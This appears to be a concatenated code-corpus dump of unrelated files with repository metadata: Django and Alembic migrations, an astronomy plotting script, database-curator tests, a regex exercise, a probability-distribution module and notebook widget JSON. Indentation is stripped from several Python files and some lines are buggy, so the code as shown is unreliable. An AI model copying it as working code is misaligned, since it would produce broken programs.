CELERY_BROKER_URL = 'amqp://localhost'
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = 'smtp.gmail.com'
EMAIL_PORT = 587
EMAIL_HOST_USER = 'alfabravo318@gmail.com' # put your gmail address here
EMAIL_HOST_PASSWORD = '<your-gmail-password>'
EMAIL_USE_TLS = True | [
"cinorouizi@gail.com"
] | cinorouizi@gail.com |
c8ad7af9d76ef8be5d1b26a289a1e34c63629ed6 | 00e01a758e72a51de6de169e66d1dbb3bd1d8403 | /Code/Plot_N1068_estim.py | 1ffb33a079e64bc58577148c93901d361a49b642 | [] | no_license | kstlaurent/NIRISS_NRM | 5b4645d06abe7bdd413eb8d723f39430c66b7277 | 84e6fa79cafe7a1580b1e96e58bbfddab5bcb69d | refs/heads/master | 2020-04-11T23:26:07.118511 | 2018-12-17T17:36:52 | 2018-12-17T17:36:52 | 162,166,652 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,243 | py | import sys, os, time
import numpy as np
import scipy.special
from scipy import signal
from astropy.io import fits
import math
from FigArray import FigArray
import numpy as np
import pylab as plt
import gc
from matplotlib.ticker import MultipleLocator, FormatStrFormatter
import string
from datetime import datetime
from mpl_toolkits.mplot3d import Axes3D
LOC = '/Users/kstlaurent/NIRISS NRM/'
ESTIM_FILE = 'N1068_Estim/%s_OPD162_ff%.2f_F430M_N1068_N%0.E_noisy_bar%.1f.fits'#(pup,ff,phot)
estim_plot = 'N1068_Plots/NoisyEstimBars_%s_ff%.2f_162.pdf'#(pup,ff)
PUPILS = ['MASK_NRM','CLEARP']
BAR_BRIGHTNESS = [0.0,0.3,1.0]
Nphotons = [1E8,1E7]
FLAT_FIELD_ERROR = [0.00,0.01]
PWR = 0.15
CLP = .8
ov = 11
fov = 81
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
plotting the metric 'map'
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
def grab_files(pup,ff):
estimlist = []
estimmaxlist = []
estimminlist = []
for bright in BAR_BRIGHTNESS:
for phot in Nphotons:
estim = fits.getdata(LOC+ESTIM_FILE%(pup,ff,phot,bright))[::-1,:]
print ESTIM_FILE%(pup,ff,phot,bright)
estimlist.append(estim)
estimmaxlist.append(estim.max())
estimminlist.append(estim.min())
return estimlist, estimmaxlist,estimminlist
def PlotOutput(pup,ff):
x = len(BAR_BRIGHTNESS)
y = len(Nphotons)
frameW = 1.5
frameH = 1.5
gapw = 0.05*np.ones(x+1)
gapw[0] = 0.2
gaph = 0.05*np.ones(y+1)
gaph[2] = 0.2
fig = FigArray(frameW, frameH, gapw, gaph)
(W, H) = fig.dimensions()
plt.figure(1, figsize=(W, H))
estimlist, estimmaxlist,estimminlist = grab_files(pup,ff)
ctr = 0
plt.text(0.03,1.06, "no bar", fontsize=10, rotation=0, color='k')
plt.text(0.32,1.06, "30% ring brightness", fontsize=10, rotation=0, color='k')
plt.text(0.76,1.06, "equal brightness", fontsize=10, rotation=0, color='k')
plt.text(-0.155,0.85, "$10^7$ photons", fontsize=10, rotation=90, color='k')
plt.text(-0.155,0.3, "$10^8$ photons", fontsize=10, rotation=90, color='k')
plt.axis("off")
for i in range(x):
for j in range(y):
dispim = np.power(estimlist[ctr],PWR)
dispim = dispim[36:46,36:46]
estimmax = np.power(estimmaxlist[ctr],PWR)
#origin set in top-left corner
a = plt.axes(fig.axes(i+1,j+1))
#plt.text(0.1,6, "brightness = %.1f" %(BAR_BRIGHTNESS[i]), fontsize=5, rotation=0, color='w')
#plt.text(0.1,13, "%.0E" %(Nphotons[j]), fontsize=5, rotation=0, color='w')
#plt.text(0.1, 20, "i = %d, j = %d"%(i,j), fontsize=5, rotation=0, color='y')
#plt.text(0.1, 25, "ctr = %d"%(ctr), fontsize=5, rotation=0, color='y')
p = plt.imshow(dispim,vmax = estimmax,vmin=0,cmap = 'gist_heat',interpolation='nearest')
a.xaxis.set_major_locator(plt.NullLocator())
a.yaxis.set_major_locator(plt.NullLocator())
plt.gray() # overrides current and sets default
ctr += 1
plt.savefig(LOC+estim_plot%(pup,ff), dpi=150)
plt.close()
""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
def main():
for pup in PUPILS:
for ff in FLAT_FIELD_ERROR:
PlotOutput(pup,ff)
print 'done'
if __name__ == "__main__":
main() | [
"kstlaurent@johan.stsci.edu"
] | kstlaurent@johan.stsci.edu |
fc14710c5169e89597505c204e9e4235a06bf786 | a2603b496c61845496caa3969218d66f1dca16c4 | /alembic/versions/3d21a9e6821c_added_locked_param_to_task_model.py | 8000cb725a8f36390356b9e1e470218c6c67c0c6 | [] | no_license | RRCKI/panda-web-client | d65164b3e73b7a9e82fe91da8b17d7296a0f04ab | dfa7f14d8c6cb0f556ed6549254596a9c759b030 | refs/heads/master | 2021-01-23T14:19:52.463516 | 2017-07-17T12:57:38 | 2017-07-17T12:57:38 | 33,311,340 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 621 | py | """added locked param to Task model
Revision ID: 3d21a9e6821c
Revises: 041111f828b0
Create Date: 2016-06-21 15:34:11.361072
"""
# revision identifiers, used by Alembic.
revision = '3d21a9e6821c'
down_revision = '041111f828b0'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('tasks', sa.Column('locked', sa.Boolean(), nullable=True))
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('tasks', 'locked')
### end Alembic commands ### | [
"itertychnyy@gmail.com"
] | itertychnyy@gmail.com |
3964eb52503f38076997946862a10eb5c58df7a7 | c7967310054b3c8a557e12d245a626edfda8d9c0 | /tests/curator_tests.py | 44786bbfcbe0075263102adbdcf506299ed91a96 | [
"MIT"
] | permissive | kbokarius/oiot | feec13fbf574c5d836630d528ebe58cbc4b1e058 | 090f690877ece923d8f795d433faa95c2db449c0 | refs/heads/master | 2021-01-01T17:33:07.728731 | 2014-12-29T03:06:16 | 2014-12-29T03:06:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,532 | py | import os, sys, unittest, time
from datetime import datetime
from subprocess import Popen
import threading
from oiot import OiotClient, Job, CollectionKeyIsLocked, JobIsCompleted, \
JobIsRolledBack, JobIsFailed, FailedToComplete, Job, Curator, \
FailedToRollBack, RollbackCausedByException, JobIsTimedOut
from oiot.settings import _curator_heartbeat_timeout_in_ms, \
_additional_timeout_wait_in_ms, _max_job_time_in_ms, \
_jobs_collection, _locks_collection
from oiot.job import Job
from .test_tools import _were_collections_cleared, _oio_api_key, \
_verify_job_creation, _clear_test_collections, \
_verify_lock_creation
def run_test_curation_of_timed_out_jobs(client, test_instance):
test3_key = Job._generate_key()
response3 = client.put('test3', test3_key,
{'value_key3': 'value_value3'})
response3.raise_for_status()
response = client.get('test3', test3_key,
response3.ref, False)
response.raise_for_status()
test_instance.assertEqual({'value_key3': 'value_value3'}, response.json)
job = Job(client)
response2 = job.post('test2', {'value_key2': 'value_value2'})
response2.raise_for_status()
response = client.get('test2', response2.key,
response2.ref, False)
response.raise_for_status()
test_instance.assertEqual({'value_key2': 'value_value2'}, response.json)
response3 = job.put('test3', test3_key,
{'value_newkey3': 'value_newvalue3'}, response3.ref)
response3.raise_for_status()
response = client.get('test3', test3_key,
response3.ref, False)
response.raise_for_status()
test_instance.assertEqual({'value_newkey3': 'value_newvalue3'},
response.json)
response4 = client.post('test4', {'value_key4': 'value_value4'})
response4.raise_for_status()
response = job.delete('test4', response4.key)
response.raise_for_status()
response = client.get('test4', response4.key, None, False)
test_instance.assertEqual(response.status_code, 404)
time.sleep(((_max_job_time_in_ms + _additional_timeout_wait_in_ms)
/ 1000.0) * test_instance._curator_sleep_time_multiplier)
response = client.get('test2', response2.key, None, False)
test_instance.assertEqual(response.status_code, 404)
response = client.get('test3', test3_key, None, False)
response.raise_for_status()
test_instance.assertEqual({'value_key3': 'value_value3'}, response.json)
response = client.get('test4', response4.key, None, False)
response.raise_for_status()
test_instance.assertEqual({'value_key4': 'value_value4'}, response.json)
response = client.get(_jobs_collection, job._job_id,
None, False)
test_instance.assertEqual(response.status_code, 404)
for lock in job._locks:
if lock.job_id == job._job_id:
response = client.get(_locks_collection,
Job._get_lock_collection_key(lock.collection,
lock.key), None, False)
test_instance.assertEqual(response.status_code, 404)
def run_test_curation_of_timed_out_locks(client, test_instance):
test2_key = Job._generate_key()
test3_key = Job._generate_key()
job = Job(client)
job._get_lock('test2', test2_key)
job._get_lock('test3', test3_key)
for lock in job._locks:
if lock.job_id == job._job_id:
response = client.get(_locks_collection,
Job._get_lock_collection_key(lock.collection,
lock.key), None, False)
response.raise_for_status()
time.sleep(((_max_job_time_in_ms + _additional_timeout_wait_in_ms)
/ 1000.0) * test_instance._curator_sleep_time_multiplier)
for lock in job._locks:
if lock.job_id == job._job_id:
response = client.get(_locks_collection,
Job._get_lock_collection_key(lock.collection,
lock.key), None, False)
test_instance.assertEqual(response.status_code, 404)
def run_test_changed_records_are_not_rolled_back(client, test_instance):
test3_key = Job._generate_key()
response3 = client.put('test3', test3_key,
{'value_key3': 'value_value3'})
response3.raise_for_status()
response = client.get('test3', test3_key,
response3.ref, False)
response.raise_for_status()
test_instance.assertEqual({'value_key3': 'value_value3'}, response.json)
job = Job(client)
response2 = job.post('test2', {'value_key2': 'value_value2'})
response2.raise_for_status()
response = client.get('test2', response2.key,
response2.ref, False)
response.raise_for_status()
test_instance.assertEqual({'value_key2': 'value_value2'}, response.json)
response2 = client.put('test2', response2.key,
{'value_changedkey2': 'value_changedvalue2'},
response2.ref, False)
response2.raise_for_status()
response3 = job.put('test3', test3_key,
{'value_newkey3': 'value_newvalue3'}, response3.ref)
response3.raise_for_status()
response = client.get('test3', test3_key,
response3.ref, False)
response.raise_for_status()
test_instance.assertEqual({'value_newkey3': 'value_newvalue3'},
response.json)
response3 = client.put('test3', test3_key,
{'value_changedkey3': 'value_changedvalue3'},
response3.ref, False)
response3.raise_for_status()
response4 = client.post('test4', {'value_key4': 'value_value4'})
response4.raise_for_status()
response = client.get('test4', response4.key, response4.ref, False)
response.raise_for_status()
test_instance.assertEqual({'value_key4': 'value_value4'},
response.json)
response = job.delete('test4', response4.key)
response.raise_for_status()
response = client.put('test4', response4.key,
{'value_newkey4': 'value_newvalue4'}, False, False)
response.raise_for_status
time.sleep(((_max_job_time_in_ms + _additional_timeout_wait_in_ms)
/ 1000.0) * test_instance._curator_sleep_time_multiplier)
response = client.get('test2', response2.key, None, False)
response.raise_for_status()
test_instance.assertEqual({'value_changedkey2': 'value_changedvalue2'},
response.json)
response = client.get('test3', test3_key, None, False)
response.raise_for_status()
test_instance.assertEqual({'value_changedkey3': 'value_changedvalue3'},
response.json)
response = client.get('test4', response4.key, None, False)
response.raise_for_status()
test_instance.assertEqual({'value_newkey4': 'value_newvalue4'},
response.json)
response = client.get(_jobs_collection, job._job_id,
None, False)
test_instance.assertEqual(response.status_code, 404)
for lock in job._locks:
if lock.job_id == job._job_id:
response = client.get(_locks_collection,
Job._get_lock_collection_key(lock.collection,
lock.key), None, False)
test_instance.assertEqual(response.status_code, 404)
class CuratorTests(unittest.TestCase):
def setUp(self):
# Verify o.io is up and the key is valid.
global _oio_api_key
self._client = OiotClient(_oio_api_key)
self._client.ping().raise_for_status()
self._curator_sleep_time_multiplier = 2.5
global _were_collections_cleared
if _were_collections_cleared is not True:
_clear_test_collections(self._client)
# Sleep to give o.io time to delete the collections. Without this
# delay inconsistent results will be encountered.
time.sleep(4)
_were_collections_cleared = True
self._curator_processes = []
# Start many curator processes to simulate a real environment.
for index in range(5):
self._curator_processes.append(Popen(['python', 'run_curator.py',
_oio_api_key]))
def tearDown(self):
for process in self._curator_processes:
process.kill()
def test_curation_of_timed_out_jobs(self):
run_test_curation_of_timed_out_jobs(self._client, self)
def test_curation_of_timed_out_locks(self):
run_test_curation_of_timed_out_locks(self._client, self)
def test_changed_records_are_not_rolled_back(self):
run_test_changed_records_are_not_rolled_back(self._client, self)
if __name__ == '__main__':
unittest.main()
| [
"bokarius@comcast.net"
] | bokarius@comcast.net |
407a17f2709c3927b4f2464518c610e3df7c44f2 | 9b0f155498c91b0c9a2f3730bdfc37a28e26f5b5 | /python_regexpr.py | 64c38041272e33e4d65ffb146546ff7b71f0694f | [] | no_license | suryathejaambati/python_functions | e799b439917e3739f0860a39b35f5c5b48263c06 | aa55dca564d17483ae23b53b0715276bd03e8b8d | refs/heads/master | 2022-05-28T07:53:00.478233 | 2020-05-05T11:30:01 | 2020-05-05T11:30:01 | 261,444,429 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 931 | py | import re
#text="@ This is a python and it is easy to learni and it is popular one for dev automation 7 35 46 $"
text=" ispythonlanguage and it consists python2 version and python3 version"
#text="This is a ip address of my db1 server: 255.255.255.255 345627830374"
#text="This is python @ 345 _ - ("
#my_pat="sa"
#my_pat="i[ston]"
#my_pat="[abcd]"
#my_pat="[a-d]"
#my_pat="[a-f g-n s-z]"
#my_pat="\w"
#my_pat="\w\w"
#my_pat="\w\w\w"
#my_pat="\w\w\w\w"
#my_pat="\W"
#my_pat="\d"
#my_pat="python\d"
#my_pat="\d\d"
#my_pat="."
#my_pat=".."
#my_pat="..."
#my_pat="\."
#my_pat="\d\d\d"
#my_pat="\d\d\d.\d\d\d.\d\d\d.\d\d\d"
#my_pat="^i[ts]"
#my_pat="version$"
#my_pat=r"\bversion"
#my_pat=r"\bpython\b"
#my_pat=r"\Bpython\B"
my_pat=r"\tis"
#print(len(re.findall(my_pat,text)))
#print(re.findall(my_pat,text))
#text="This is python @ 345 _ - ("
#print(re.findall('\w',text))
#print(re.findall('.',text))
print(re.findall(my_pat,text))
| [
"ec2-user@ip-172-31-84-17.ec2.internal"
] | ec2-user@ip-172-31-84-17.ec2.internal |
c6a7fbd32d85a9e5f274cc76bf525b7c4eb7bf77 | 33febf8b617ef66d7086765f1c0bf6523667a959 | /probpy/distributions/uniform.py | 3b06514b722dc180d8f041489b3cc970add316b3 | [] | no_license | JonasRSV/probpy | 857201c7f122461463b75d63e5c688e011615292 | 5203063db612b2b2bc0434a7f2a02c9d2e27ed6a | refs/heads/master | 2022-07-07T06:17:44.504570 | 2020-04-15T14:52:20 | 2020-04-15T14:52:20 | 245,820,195 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,578 | py | import numpy as np
import numba
from typing import Tuple
from probpy.core import Distribution, RandomVariable, Parameter
class Uniform(Distribution):
"""Uniform Distribution"""
a = "a"
b = "b"
@classmethod
def med(cls, a: np.float = None, b: np.float = None) -> RandomVariable:
"""
:param a: lower bound
:param b: upper bound
:return: RandomVariable
"""
if a is None and b is None:
_sample = Uniform.sample
_p = Uniform.p
elif a is None:
def _sample(a: np.ndarray, size: int = 1): return Uniform.sample(a, b, size)
def _p(x: np.ndarray, a: np.ndarray): return Uniform.p(x, a, b)
elif b is None:
def _sample(b: np.ndarray, size: int = 1): return Uniform.sample(a, b, size)
def _p(x: np.ndarray, b: np.ndarray): return Uniform.p(x, a, b)
else:
def _sample(size: int = 1): return Uniform.sample(a, b, size)
def _p(x: np.ndarray): return Uniform.p(x, a, b)
parameters = {
Uniform.a: Parameter((), a),
Uniform.b: Parameter((), b)
}
return RandomVariable(_sample, _p, shape=(), parameters=parameters, cls=cls)
@staticmethod
@numba.jit(nopython=False, forceobj=True)
def sample(a: np.float, b: np.float, size: int = 1) -> np.ndarray:
return np.array(a + np.random.rand(size) * (b - a))
@staticmethod
@numba.jit(nopython=True, forceobj=False)
def fast_p(x: np.ndarray, a: np.float, b: np.float):
return ((a < x) & (x < b)) / (b - a)
@staticmethod
def p(x: np.ndarray, a: np.ndarray, b: np.ndarray) -> np.ndarray:
if type(x) != np.ndarray: x = np.array(x)
if type(a) != np.ndarray: a = np.array(a)
if type(b) != np.ndarray: b = np.array(b)
return Uniform.fast_p(x, a, b)
@staticmethod
def jit_probability(rv: RandomVariable):
a = rv.parameters[Uniform.a].value
b = rv.parameters[Uniform.b].value
_fast_p = Uniform.fast_p
if a is None and b is None:
return _fast_p
elif a is None:
def fast_p(x: np.ndarray, a: np.float):
return _fast_p(x, a, b)
elif b is None:
def fast_p(x: np.ndarray, b: np.float):
return _fast_p(x, a, b)
else:
def fast_p(x: np.ndarray):
return _fast_p(x, a, b)
fast_p = numba.jit(nopython=True, forceobj=False, fastmath=True)(fast_p)
return fast_p
class MultiVariateUniform(Distribution):
"""Multivariate Uniform distribution"""
a = "a"
b = "b"
@classmethod
def med(cls, a: np.ndarray = None, b: np.ndarray = None, dimension: Tuple = None) -> RandomVariable:
"""
:param a: lower bound
:param b: upper bound
:param dimension: dimension of r.v
:return: RandomVariable
"""
if a is None and b is None:
_sample = MultiVariateUniform.sample
_p = MultiVariateUniform.p
shape = dimension
elif a is None:
def _sample(a: np.ndarray, size: int = 1): return MultiVariateUniform.sample(a, b, size)
def _p(x: np.ndarray, a: np.ndarray): return MultiVariateUniform.p(x, a, b)
shape = b.size
elif b is None:
def _sample(b: np.ndarray, size: int = 1): return MultiVariateUniform.sample(a, b, size)
def _p(x: np.ndarray, b: np.ndarray): return MultiVariateUniform.p(x, a, b)
shape = a.size
else:
def _sample(size: int = 1): return MultiVariateUniform.sample(a, b, size)
def _p(x: np.ndarray): return MultiVariateUniform.p(x, a, b)
shape = a.size
parameters = {
MultiVariateUniform.a: Parameter(shape, a),
MultiVariateUniform.b: Parameter(shape, b)
}
return RandomVariable(_sample, _p, shape=shape, parameters=parameters, cls=cls)
@staticmethod
def sample(a: np.ndarray, b: np.ndarray, size: int = 1) -> np.ndarray:
return a + np.random.rand(size, a.size) * (b - a)
@staticmethod
@numba.jit(nopython=True, fastmath=True, forceobj=False)
def fast_p(x: np.ndarray, a: np.ndarray, b: np.ndarray):
indicator_matrix = ((a < x) & (x < b))
indicator_vector = np.array([np.all(indicator_matrix[i]) for i in range(len(x))])
probability = 1 / np.prod(b - a)
return indicator_vector * probability
@staticmethod
def p(x: np.ndarray, a: np.ndarray, b: np.ndarray) -> np.ndarray:
if type(x) != np.ndarray: x = np.array(x)
if type(a) != np.ndarray: a = np.array(a)
if type(b) != np.ndarray: b = np.array(b)
if x.ndim == 1: x = x.reshape(-1, a.size)
return MultiVariateUniform.fast_p(x, a, b)
@staticmethod
def jit_probability(rv: RandomVariable):
a = rv.parameters[Uniform.a].value
b = rv.parameters[Uniform.b].value
_fast_p = MultiVariateUniform.fast_p
if a is None and b is None:
return _fast_p
elif a is None:
def fast_p(x: np.ndarray, a: np.float):
return _fast_p(x, a, b)
elif b is None:
def fast_p(x: np.ndarray, b: np.float):
return _fast_p(x, a, b)
else:
def fast_p(x: np.ndarray):
return _fast_p(x, a, b)
fast_p = numba.jit(nopython=True, forceobj=False, fastmath=True)(fast_p)
return fast_p
| [
"jonas@valfridsson.net"
] | jonas@valfridsson.net |
c8262985ee77ab6c81a16c4b23acecf04caaa553 | aace0da1ccc63780757c6b4e9dd88b87f0a2591b | /blog/migrations/0001_initial.py | 944d822291573755826e61cb34baf6c65e44d3c8 | [] | no_license | mairacosta/djangogirls-tutorial | cba1dfacd69eb8a212718882085b19a276ddddd2 | f3da5b20284cab8dda53edab023ea4cedbbb13bc | refs/heads/master | 2022-12-28T05:12:34.932219 | 2020-10-08T20:38:01 | 2020-10-08T20:38:01 | 300,419,837 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 984 | py | # Generated by Django 3.1 on 2020-09-29 19:15
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200)),
('text', models.TextField()),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"maira_mcs@hotmail.com"
] | maira_mcs@hotmail.com |
95c4d95e6b0e37459bd1811c64cfdb080c568dad | 13d1d744d0b7ff8854e7328c03900458a9ecfe2a | /final.py | bbe9ae3ed2b83253e3a4cbc07ff3a9744bd25b18 | [] | no_license | samyuktha-12/Aug2021-contest | 9fcb430dc45d33a90692bf83930c3e346f5f6dc6 | 58863d9fd31a3bba2a055b206cd95c01e656accb | refs/heads/main | 2023-07-04T18:36:22.736175 | 2021-08-22T02:46:31 | 2021-08-22T02:46:31 | 397,106,191 | 2 | 0 | null | 2021-08-17T05:01:33 | 2021-08-17T05:01:32 | null | UTF-8 | Python | false | false | 76,889 | py | {
"nbformat": 4,
"nbformat_minor": 0,
"metadata": {
"colab": {
"name": "final.ipynb",
"provenance": [],
"collapsed_sections": [],
"authorship_tag": "ABX9TyPNfNHc6LfWu9Tl25akcsB8",
"include_colab_link": true
},
"kernelspec": {
"display_name": "Python 3",
"name": "python3"
},
"language_info": {
"name": "python"
},
"accelerator": "GPU",
"widgets": {
"application/vnd.jupyter.widget-state+json": {
"6389fd3f3dc44050a610f69ab5e6a180": {
"model_module": "@jupyter-widgets/controls",
"model_name": "HBoxModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "HBoxView",
"_dom_classes": [],
"_model_name": "HBoxModel",
"_view_module": "@jupyter-widgets/controls",
"_model_module_version": "1.5.0",
"_view_count": null,
"_view_module_version": "1.5.0",
"box_style": "",
"layout": "IPY_MODEL_e86b2bbb520d4af990e84769814bbea5",
"_model_module": "@jupyter-widgets/controls",
"children": [
"IPY_MODEL_42cacbc4410c4cd5861b324e9122fff7",
"IPY_MODEL_ee6e111cae584dccb59e4a18fe5996e9",
"IPY_MODEL_a64dcbd7f61c48dfa7d6fdd68d8c1758"
]
}
},
"e86b2bbb520d4af990e84769814bbea5": {
"model_module": "@jupyter-widgets/base",
"model_name": "LayoutModel",
"model_module_version": "1.2.0",
"state": {
"_view_name": "LayoutView",
"grid_template_rows": null,
"right": null,
"justify_content": null,
"_view_module": "@jupyter-widgets/base",
"overflow": null,
"_model_module_version": "1.2.0",
"_view_count": null,
"flex_flow": null,
"width": null,
"min_width": null,
"border": null,
"align_items": null,
"bottom": null,
"_model_module": "@jupyter-widgets/base",
"top": null,
"grid_column": null,
"overflow_y": null,
"overflow_x": null,
"grid_auto_flow": null,
"grid_area": null,
"grid_template_columns": null,
"flex": null,
"_model_name": "LayoutModel",
"justify_items": null,
"grid_row": null,
"max_height": null,
"align_content": null,
"visibility": null,
"align_self": null,
"height": null,
"min_height": null,
"padding": null,
"grid_auto_rows": null,
"grid_gap": null,
"max_width": null,
"order": null,
"_view_module_version": "1.2.0",
"grid_template_areas": null,
"object_position": null,
"object_fit": null,
"grid_auto_columns": null,
"margin": null,
"display": null,
"left": null
}
},
"42cacbc4410c4cd5861b324e9122fff7": {
"model_module": "@jupyter-widgets/controls",
"model_name": "HTMLModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "HTMLView",
"style": "IPY_MODEL_8cd6b59399bb4f6b9419273713208fe2",
"_dom_classes": [],
"description": "",
"_model_name": "HTMLModel",
"placeholder": "",
"_view_module": "@jupyter-widgets/controls",
"_model_module_version": "1.5.0",
"value": "Downloading: 100%",
"_view_count": null,
"_view_module_version": "1.5.0",
"description_tooltip": null,
"_model_module": "@jupyter-widgets/controls",
"layout": "IPY_MODEL_11b917db556441efb01f932916060f0b"
}
},
"ee6e111cae584dccb59e4a18fe5996e9": {
"model_module": "@jupyter-widgets/controls",
"model_name": "FloatProgressModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "ProgressView",
"style": "IPY_MODEL_ef5d24a03aca43a1ae8a12e60a6149f0",
"_dom_classes": [],
"description": "",
"_model_name": "FloatProgressModel",
"bar_style": "success",
"max": 1429,
"_view_module": "@jupyter-widgets/controls",
"_model_module_version": "1.5.0",
"value": 1429,
"_view_count": null,
"_view_module_version": "1.5.0",
"orientation": "horizontal",
"min": 0,
"description_tooltip": null,
"_model_module": "@jupyter-widgets/controls",
"layout": "IPY_MODEL_156c24ba6f3c40a8aa7cbe915e1c5ed5"
}
},
"a64dcbd7f61c48dfa7d6fdd68d8c1758": {
"model_module": "@jupyter-widgets/controls",
"model_name": "HTMLModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "HTMLView",
"style": "IPY_MODEL_0a80dd64f7454aad8e249a57f13b7cf5",
"_dom_classes": [],
"description": "",
"_model_name": "HTMLModel",
"placeholder": "",
"_view_module": "@jupyter-widgets/controls",
"_model_module_version": "1.5.0",
"value": " 1.43k/1.43k [00:00<00:00, 26.9kB/s]",
"_view_count": null,
"_view_module_version": "1.5.0",
"description_tooltip": null,
"_model_module": "@jupyter-widgets/controls",
"layout": "IPY_MODEL_6408458000104746a888b5b7d1bb3992"
}
},
"8cd6b59399bb4f6b9419273713208fe2": {
"model_module": "@jupyter-widgets/controls",
"model_name": "DescriptionStyleModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "StyleView",
"_model_name": "DescriptionStyleModel",
"description_width": "",
"_view_module": "@jupyter-widgets/base",
"_model_module_version": "1.5.0",
"_view_count": null,
"_view_module_version": "1.2.0",
"_model_module": "@jupyter-widgets/controls"
}
},
"11b917db556441efb01f932916060f0b": {
"model_module": "@jupyter-widgets/base",
"model_name": "LayoutModel",
"model_module_version": "1.2.0",
"state": {
"_view_name": "LayoutView",
"grid_template_rows": null,
"right": null,
"justify_content": null,
"_view_module": "@jupyter-widgets/base",
"overflow": null,
"_model_module_version": "1.2.0",
"_view_count": null,
"flex_flow": null,
"width": null,
"min_width": null,
"border": null,
"align_items": null,
"bottom": null,
"_model_module": "@jupyter-widgets/base",
"top": null,
"grid_column": null,
"overflow_y": null,
"overflow_x": null,
"grid_auto_flow": null,
"grid_area": null,
"grid_template_columns": null,
"flex": null,
"_model_name": "LayoutModel",
"justify_items": null,
"grid_row": null,
"max_height": null,
"align_content": null,
"visibility": null,
"align_self": null,
"height": null,
"min_height": null,
"padding": null,
"grid_auto_rows": null,
"grid_gap": null,
"max_width": null,
"order": null,
"_view_module_version": "1.2.0",
"grid_template_areas": null,
"object_position": null,
"object_fit": null,
"grid_auto_columns": null,
"margin": null,
"display": null,
"left": null
}
},
"ef5d24a03aca43a1ae8a12e60a6149f0": {
"model_module": "@jupyter-widgets/controls",
"model_name": "ProgressStyleModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "StyleView",
"_model_name": "ProgressStyleModel",
"description_width": "",
"_view_module": "@jupyter-widgets/base",
"_model_module_version": "1.5.0",
"_view_count": null,
"_view_module_version": "1.2.0",
"bar_color": null,
"_model_module": "@jupyter-widgets/controls"
}
},
"156c24ba6f3c40a8aa7cbe915e1c5ed5": {
"model_module": "@jupyter-widgets/base",
"model_name": "LayoutModel",
"model_module_version": "1.2.0",
"state": {
"_view_name": "LayoutView",
"grid_template_rows": null,
"right": null,
"justify_content": null,
"_view_module": "@jupyter-widgets/base",
"overflow": null,
"_model_module_version": "1.2.0",
"_view_count": null,
"flex_flow": null,
"width": null,
"min_width": null,
"border": null,
"align_items": null,
"bottom": null,
"_model_module": "@jupyter-widgets/base",
"top": null,
"grid_column": null,
"overflow_y": null,
"overflow_x": null,
"grid_auto_flow": null,
"grid_area": null,
"grid_template_columns": null,
"flex": null,
"_model_name": "LayoutModel",
"justify_items": null,
"grid_row": null,
"max_height": null,
"align_content": null,
"visibility": null,
"align_self": null,
"height": null,
"min_height": null,
"padding": null,
"grid_auto_rows": null,
"grid_gap": null,
"max_width": null,
"order": null,
"_view_module_version": "1.2.0",
"grid_template_areas": null,
"object_position": null,
"object_fit": null,
"grid_auto_columns": null,
"margin": null,
"display": null,
"left": null
}
},
"0a80dd64f7454aad8e249a57f13b7cf5": {
"model_module": "@jupyter-widgets/controls",
"model_name": "DescriptionStyleModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "StyleView",
"_model_name": "DescriptionStyleModel",
"description_width": "",
"_view_module": "@jupyter-widgets/base",
"_model_module_version": "1.5.0",
"_view_count": null,
"_view_module_version": "1.2.0",
"_model_module": "@jupyter-widgets/controls"
}
},
"6408458000104746a888b5b7d1bb3992": {
"model_module": "@jupyter-widgets/base",
"model_name": "LayoutModel",
"model_module_version": "1.2.0",
"state": {
"_view_name": "LayoutView",
"grid_template_rows": null,
"right": null,
"justify_content": null,
"_view_module": "@jupyter-widgets/base",
"overflow": null,
"_model_module_version": "1.2.0",
"_view_count": null,
"flex_flow": null,
"width": null,
"min_width": null,
"border": null,
"align_items": null,
"bottom": null,
"_model_module": "@jupyter-widgets/base",
"top": null,
"grid_column": null,
"overflow_y": null,
"overflow_x": null,
"grid_auto_flow": null,
"grid_area": null,
"grid_template_columns": null,
"flex": null,
"_model_name": "LayoutModel",
"justify_items": null,
"grid_row": null,
"max_height": null,
"align_content": null,
"visibility": null,
"align_self": null,
"height": null,
"min_height": null,
"padding": null,
"grid_auto_rows": null,
"grid_gap": null,
"max_width": null,
"order": null,
"_view_module_version": "1.2.0",
"grid_template_areas": null,
"object_position": null,
"object_fit": null,
"grid_auto_columns": null,
"margin": null,
"display": null,
"left": null
}
},
"d13dbb8559ba40a9a2f9dc7f0f5ea40d": {
"model_module": "@jupyter-widgets/controls",
"model_name": "HBoxModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "HBoxView",
"_dom_classes": [],
"_model_name": "HBoxModel",
"_view_module": "@jupyter-widgets/controls",
"_model_module_version": "1.5.0",
"_view_count": null,
"_view_module_version": "1.5.0",
"box_style": "",
